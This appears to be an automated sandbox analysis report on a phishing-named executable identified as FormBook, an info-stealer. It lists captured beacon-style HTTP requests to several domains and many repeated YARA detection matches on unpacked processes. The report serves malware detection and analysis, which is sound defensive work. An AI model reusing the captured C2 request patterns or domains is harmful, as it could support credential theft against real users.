          Source: global trafficHTTP traffic detected: GET /g43o/?j0DLG=br5CaOBNbOyEtSl01w1InJFcLjJpKSipTIGKYv8LLz1h7U2pe/W5LRlDNuBFVm8Z7kz1&zl_PqJ=KxlpdRmXzNBLJpD0 HTTP/1.1Host: www.aireapartmentsmsp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g43o/?j0DLG=QkSDkAQwJsfinh3WrOYNwuLRn/wZcwP5ROix40ZEWiTyy9DSEEEXqyK/VjgFco5oKzQL&zl_PqJ=KxlpdRmXzNBLJpD0 HTTP/1.1Host: www.feasible-weld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g43o/?j0DLG=XuLail99yhDrYyUhKwxkqBfGD2vc/Hu9afcS26YM4Nd4m4Phs+vvTj1Fs76Yca0I+p5F&zl_PqJ=KxlpdRmXzNBLJpD0 HTTP/1.1Host: www.athletes4africa.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /g43o/?j0DLG=HsquawsfcsgqJ94EtmUD1wYxaBGU5jkWnmyWAJcE1YBxo/BZ5yoFsc9Zh9ltV0MQdvJb&zl_PqJ=KxlpdRmXzNBLJpD0 HTTP/1.1Host: www.sturgisbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000022.00000000.562360179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.655660259.0000000001BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.808079827.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.592834200.000000000499F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000000.561892180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.807067648.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000000.558484436.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.360269598.0000000003CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.653301219.0000000001580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.592270936.000000000453F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000000.618178805.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000000.620167553.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.593184990.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000000.558921224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.805766092.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.592449978.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.653589818.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.651959941.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.652361426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000000.617344321.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000026.00000002.655815851.0000000000A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.425092835.00000000048D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000000.622582494.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.655749775.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 33.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 33.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 34.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 34.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 33.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 33.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 33.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 33.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 33.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 33.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 34.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 34.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 33.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 33.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 34.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 34.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 34.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 34.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 33.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 33.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 34.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 34.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 33.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 33.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 34.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 34.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 34.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 34.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000022.00000000.562360179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000022.00000000.562360179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000021.00000002.655660259.0000000001BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000021.00000002.655660259.0000000001BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000025.00000002.808079827.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000025.00000002.808079827.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001F.00000002.592834200.000000000499F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001F.00000002.592834200.000000000499F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000022.00000000.561892180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000022.00000000.561892180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000025.00000002.807067648.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000025.00000002.807067648.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000021.00000000.558484436.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000021.00000000.558484436.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.360269598.0000000003CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.360269598.0000000003CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000022.00000002.653301219.0000000001580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000022.00000002.653301219.0000000001580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001E.00000002.592270936.000000000453F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001E.00000002.592270936.000000000453F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000024.00000000.618178805.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000024.00000000.618178805.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000024.00000000.620167553.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000024.00000000.620167553.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001F.00000002.593184990.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001F.00000002.593184990.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000021.00000000.558921224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000021.00000000.558921224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000025.00000002.805766092.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000025.00000002.805766092.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001E.00000002.592449978.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001E.00000002.592449978.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000021.00000002.653589818.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000021.00000002.653589818.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000022.00000002.651959941.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000022.00000002.651959941.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000021.00000002.652361426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000021.00000002.652361426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000024.00000000.617344321.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000024.00000000.617344321.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000026.00000002.655815851.0000000000A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000026.00000002.655815851.0000000000A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.425092835.00000000048D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.425092835.00000000048D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000024.00000000.622582494.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000024.00000000.622582494.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000022.00000002.655749775.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000022.00000002.655749775.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Hesab#U0131 Onaylay#U0131n.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Hesab#U0131 Onaylay#U0131n.exe, type: SAMPLEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
          Source: 33.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 33.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 34.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 34.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 33.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 33.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.0.java.exe.a00000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
          Source: 31.2.java.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
          Source: 33.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 33.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 33.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 33.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 34.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 34.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 33.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 33.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 34.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 34.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.0.java.exe.a00000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
          Source: 0.0.Hesab#U0131 Onaylay#U0131n.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
          Source: 34.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 34.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 33.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 33.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 30.0.java.exe.880000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
          Source: 34.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 34.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.2.java.exe.a00000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
          Source: 33.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 33.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
